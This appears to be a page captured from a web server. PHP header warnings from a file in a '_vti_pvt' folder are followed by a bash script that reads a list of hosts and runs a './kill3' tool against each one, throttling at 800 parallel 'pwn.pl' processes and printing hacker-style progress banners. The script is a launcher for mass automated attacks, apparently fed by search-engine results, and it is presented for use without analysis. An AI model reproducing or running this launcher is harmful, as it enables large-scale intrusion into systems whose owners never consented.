Warning: Cannot modify header information - headers already sent by (output started at /home/ronrob/public_html/_vti_pvt/ccou.php:1) in /home/ronrob/public_html/_vti_pvt/ccou.php on line 179
Warning: Cannot modify header information - headers already sent by (output started at /home/ronrob/public_html/_vti_pvt/ccou.php:1) in /home/ronrob/public_html/_vti_pvt/ccou.php on line 180
Warning: Cannot modify header information - headers already sent by (output started at /home/ronrob/public_html/_vti_pvt/ccou.php:1) in /home/ronrob/public_html/_vti_pvt/ccou.php on line 181
Warning: Cannot modify header information - headers already sent by (output started at /home/ronrob/public_html/_vti_pvt/ccou.php:1) in /home/ronrob/public_html/_vti_pvt/ccou.php on line 182
Warning: Cannot modify header information - headers already sent by (output started at /home/ronrob/public_html/_vti_pvt/ccou.php:1) in /home/ronrob/public_html/_vti_pvt/ccou.php on line 183
Warning: Cannot modify header information - headers already sent by (output started at /home/ronrob/public_html/_vti_pvt/ccou.php:1) in /home/ronrob/public_html/_vti_pvt/ccou.php on line 184
#!/bin/bash
B=$1
#IFS=$'\n'
count=0
blankLine=" "
CONTOR=0
total=`wc -l $1`
while read line; do
CONTOR=`ps x | grep -c pwn.pl`
while [ $CONTOR -ge 800 ];do
CONTOR=`ps x | grep -c pwn.pl`
sleep 6
done
if [ $CONTOR -le 800 ]; then
let count=count+1
./kill3 $line
echo -n -e "\e[1;33;1m\r$blankLine\r\e[0m"
echo -n -e "\e[1;37;1m[\e[1;32;1m+\e[1;37;1m]BING: $count of $total @ip2host\e[0m"
fi
done < $B
echo -n -e "\e[1;33;1m\r$blankLine\r\e[0m"
echo -n -e "\e[1;37;1m[\e[1;32;1m+\e[1;37;1m]FOUND $count bing's..\e[0m\n"